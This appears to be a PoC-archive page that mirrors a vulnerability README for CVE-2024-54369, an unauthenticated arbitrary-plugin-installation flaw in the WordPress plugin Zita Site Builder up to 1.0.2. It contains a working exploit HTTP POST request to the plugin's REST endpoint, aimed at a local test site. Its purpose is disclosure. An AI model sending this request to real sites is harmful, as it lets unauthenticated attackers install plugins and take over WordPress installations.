关联漏洞
描述
Zita Site Builder <= 1.0.2 - Missing Authorization to Arbitrary Plugin Installation
介绍
# CVE-2024-54369
Zita Site Builder <= 1.0.2 - Missing Authorization to Arbitrary Plugin Installation
# Description
The Zita Site Builder plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on one of its functions in versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins.
## Details
- **Type**: plugin
- **Slug**: ai-site-builder
- **Affected Version**: 1.0.2
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-54369
- **Status**: Closed
POC
---
```
POST /wp-json/ai/v1/ai-site-builder HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=ai-site-builder&template=step
Content-Type: application/json
Content-Length: 245
Origin: https://wp-dev.ddev.site
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
{"params":{"templateType":"free","plugin":{"woocommerce":"Woocommerce"},"allPlugins":[{"woocommerce":"woocommerce/woocommerce.php"}],"builder":"th-shop-mania","themeSlug":"th-shop-mania","proThemePlugin":"hunk-companion","tmplFreePro":"plugin"}}
```
```
"\"https:\\\/\\\/wp-dev.ddev.site\""
```
文件快照
[4.0K] /data/pocs/b5aa1372bc83496452905622bdf5c703e5a030ba
└── [1.5K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。